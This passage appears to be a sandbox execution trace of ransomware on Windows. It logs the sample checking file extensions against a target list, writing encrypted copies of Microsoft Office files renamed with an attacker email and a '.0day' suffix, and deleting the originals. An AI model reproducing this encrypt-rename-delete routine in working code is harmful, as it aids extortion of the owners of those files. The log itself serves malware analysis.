(lpString1=".docx", lpString2=".eftx") returned -1 [0273.833] lstrlenW (lpString=".pdf") returned 4 [0273.833] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.833] lstrlenW (lpString=".xls") returned 4 [0273.833] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.833] lstrlenW (lpString=".xlsx") returned 5 [0273.833] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.833] lstrlenW (lpString=".ppt") returned 4 [0273.833] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0273.834] lstrlenW (lpString=".zip") returned 4 [0273.834] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.834] lstrlenW (lpString=".rar") returned 4 [0273.834] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.834] lstrlenW (lpString=".bz2") returned 4 [0273.834] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.834] lstrlenW (lpString=".7z") returned 3 [0273.834] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0273.834] lstrlenW (lpString=".dbf") returned 4 [0273.834] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0273.834] lstrlenW (lpString=".1cd") returned 4 [0273.834] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0273.834] lstrlenW (lpString=".jpg") returned 4 [0273.834] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0273.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0273.834] lstrlenW (lpString=".doc") returned 4 [0273.834] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.834] lstrlenW (lpString=".docx") returned 5 [0273.834] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.834] lstrlenW (lpString=".pdf") returned 4 [0273.834] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.834] lstrlenW (lpString=".xls") returned 4 [0273.834] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.834] lstrlenW (lpString=".xlsx") returned 5 [0273.834] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.834] lstrlenW (lpString=".ppt") returned 4 [0273.834] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0273.834] lstrlenW (lpString=".zip") returned 4 [0273.834] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.834] lstrlenW (lpString=".rar") returned 4 [0273.834] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.835] lstrlenW (lpString=".bz2") returned 4 [0273.835] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.835] lstrlenW (lpString=".7z") returned 3 [0273.835] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0273.835] lstrlenW (lpString=".dbf") returned 4 [0273.835] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0273.835] lstrlenW (lpString=".1cd") returned 4 [0273.835] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0273.835] lstrlenW (lpString=".jpg") returned 4 [0273.835] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.835] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.835] lstrlenW (lpString="Pushpin.eftx") returned 12 [0273.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.836] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=782121) returned 1 [0273.836] CloseHandle (hObject=0x380) returned 1 [0273.836] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx")) returned 0x20 [0273.836] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.836] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.837] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.837] GetLastError () returned 0x0 [0273.837] ReadFile (in: hFile=0x380, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0xbef29, lpOverlapped=0x0) returned 1 [0273.854] WriteFile (in: hFile=0x37c, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xbef30, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xbef30, lpOverlapped=0x0) returned 1 [0273.920] ReadFile (in: hFile=0x380, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.920] WriteFile (in: hFile=0x37c, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.921] SetEndOfFile (hFile=0x37c) returned 1 [0273.921] CloseHandle (hObject=0x37c) returned 1 [0273.921] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.921] SetEndOfFile (hFile=0x380) returned 1 [0273.939] CloseHandle (hObject=0x380) returned 1 [0273.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.162] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx")) returned 1 [0274.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0274.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0274.162] lstrlenW (lpString=".doc") returned 4 [0274.162] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.162] lstrlenW (lpString=".docx") returned 5 [0274.162] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.162] lstrlenW (lpString=".pdf") returned 4 [0274.163] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.163] lstrlenW (lpString=".xls") returned 4 [0274.163] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.163] lstrlenW (lpString=".xlsx") returned 5 [0274.163] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.163] lstrlenW (lpString=".ppt") returned 4 [0274.163] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0274.163] lstrlenW (lpString=".zip") returned 4 [0274.163] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.163] lstrlenW (lpString=".rar") returned 4 [0274.163] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.163] lstrlenW (lpString=".bz2") returned 4 [0274.163] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.163] lstrlenW (lpString=".7z") returned 3 [0274.163] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0274.163] lstrlenW (lpString=".dbf") returned 4 [0274.163] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0274.163] lstrlenW (lpString=".1cd") returned 4 [0274.163] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0274.163] lstrlenW (lpString=".jpg") returned 4 [0274.163] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0274.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0274.163] lstrlenW (lpString=".doc") returned 4 [0274.163] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.163] lstrlenW (lpString=".docx") returned 5 [0274.163] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.163] lstrlenW (lpString=".pdf") returned 4 [0274.163] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.163] lstrlenW (lpString=".xls") returned 4 [0274.163] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.164] lstrlenW (lpString=".xlsx") returned 5 [0274.164] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.164] lstrlenW (lpString=".ppt") returned 4 [0274.164] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0274.164] lstrlenW (lpString=".zip") returned 4 [0274.164] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.164] lstrlenW (lpString=".rar") returned 4 [0274.164] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.164] lstrlenW (lpString=".bz2") returned 4 [0274.164] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.164] lstrlenW (lpString=".7z") returned 3 [0274.164] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0274.164] lstrlenW (lpString=".dbf") returned 4 [0274.164] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0274.164] lstrlenW (lpString=".1cd") returned 4 [0274.164] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79 [0274.164] lstrlenW (lpString=".jpg") returned 4 [0274.164] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.164] lstrcmpiW (lpString1=".MML", lpString2=".0day") returned 1 [0274.164] lstrlenW (lpString="CAGCAT10.MML") returned 12 [0274.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.166] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=312400) returned 1 [0274.166] CloseHandle (hObject=0x37c) returned 1 [0274.166] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml")) returned 0x20 [0274.166] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.166] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.166] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.171] GetLastError () returned 0x0 [0274.171] ReadFile (in: hFile=0x37c, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x4c450, lpOverlapped=0x0) returned 1 [0274.254] WriteFile (in: hFile=0x318, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x4c460, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x4c460, lpOverlapped=0x0) returned 1 [0274.261] ReadFile (in: hFile=0x37c, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.261] WriteFile (in: hFile=0x318, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.261] SetEndOfFile (hFile=0x318) returned 1 [0274.585] CloseHandle (hObject=0x318) returned 1 [0274.585] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.585] SetEndOfFile (hFile=0x37c) returned 1 [0274.623] CloseHandle (hObject=0x37c) returned 1 [0274.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.793] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml")) returned 1 [0274.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0274.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0274.831] lstrlenW (lpString=".doc") returned 4 [0274.831] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1 [0274.831] lstrlenW (lpString=".docx") returned 5 [0274.831] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1 [0274.831] lstrlenW (lpString=".pdf") returned 4 [0274.831] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1 [0274.831] lstrlenW (lpString=".xls") returned 4 [0274.831] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1 [0274.831] lstrlenW (lpString=".xlsx") returned 5 [0274.831] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1 [0274.831] lstrlenW (lpString=".ppt") returned 4 [0274.831] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1 [0274.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0274.831] lstrlenW (lpString=".zip") returned 4 [0274.831] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1 [0274.831] lstrlenW (lpString=".rar") returned 4 [0274.831] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0274.831] lstrlenW (lpString=".bz2") returned 4 [0274.831] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1 [0274.831] lstrlenW (lpString=".7z") returned 3 [0274.831] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1 [0274.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0274.831] lstrlenW (lpString=".dbf") returned 4 [0274.831] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0274.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0274.831] lstrlenW (lpString=".1cd") returned 4 [0274.831] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1 [0274.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0274.831] lstrlenW (lpString=".jpg") returned 4 [0274.832] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1 [0274.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0274.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0274.832] lstrlenW (lpString=".doc") returned 4 [0274.832] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1 [0274.832] lstrlenW (lpString=".docx") returned 5 [0274.832] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1 [0274.832] lstrlenW (lpString=".pdf") returned 4 [0274.832] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1 [0274.832] lstrlenW (lpString=".xls") returned 4 [0274.832] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1 [0274.832] lstrlenW (lpString=".xlsx") returned 5 [0274.832] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1 [0274.832] lstrlenW (lpString=".ppt") returned 4 [0274.832] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1 [0274.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0274.832] lstrlenW (lpString=".zip") returned 4 [0274.832] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1 [0274.832] lstrlenW (lpString=".rar") returned 4 [0274.832] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0274.832] lstrlenW (lpString=".bz2") returned 4 [0274.832] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1 [0274.832] lstrlenW (lpString=".7z") returned 3 [0274.832] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1 [0274.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0274.832] lstrlenW (lpString=".dbf") returned 4 [0274.832] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0274.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0274.832] lstrlenW (lpString=".1cd") returned 4 [0274.832] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1 [0274.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0274.832] lstrlenW (lpString=".jpg") returned 4 [0274.832] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1 [0274.833] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0274.833] lstrlenW (lpString="BULLETS.DLL") returned 11 [0274.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.845] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=15264) returned 1 [0274.845] CloseHandle (hObject=0x37c) returned 1 [0274.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll")) returned 0x20 [0274.846] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0274.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0274.847] lstrlenW (lpString=".doc") returned 4 [0274.847] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.847] lstrlenW (lpString=".docx") returned 5 [0274.847] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0274.847] lstrlenW (lpString=".pdf") returned 4 [0274.847] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.847] lstrlenW (lpString=".xls") returned 4 [0274.847] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.847] lstrlenW (lpString=".xlsx") returned 5 [0274.847] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0274.848] lstrlenW (lpString=".ppt") returned 4 [0274.848] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0274.848] lstrlenW (lpString=".zip") returned 4 [0274.848] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.848] lstrlenW (lpString=".rar") returned 4 [0274.848] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.848] lstrlenW (lpString=".bz2") returned 4 [0274.848] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.848] lstrlenW (lpString=".7z") returned 3 [0274.848] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0274.848] lstrlenW (lpString=".dbf") returned 4 [0274.848] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0274.848] lstrlenW (lpString=".1cd") returned 4 [0274.848] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0274.848] lstrlenW (lpString=".jpg") returned 4 [0274.848] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0274.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0274.848] lstrlenW (lpString=".doc") returned 4 [0274.848] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.848] lstrlenW (lpString=".docx") returned 5 [0274.848] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0274.848] lstrlenW (lpString=".pdf") returned 4 [0274.848] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.848] lstrlenW (lpString=".xls") returned 4 [0274.848] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.848] lstrlenW (lpString=".xlsx") returned 5 [0274.848] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0274.848] lstrlenW (lpString=".ppt") returned 4 [0274.848] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL") returned 68 [0274.849] lstrlenW (lpString=".zip") returned 4 [0274.849] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.849] lstrlenW (lpString=".rar") returned 4 [0274.849] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.849] 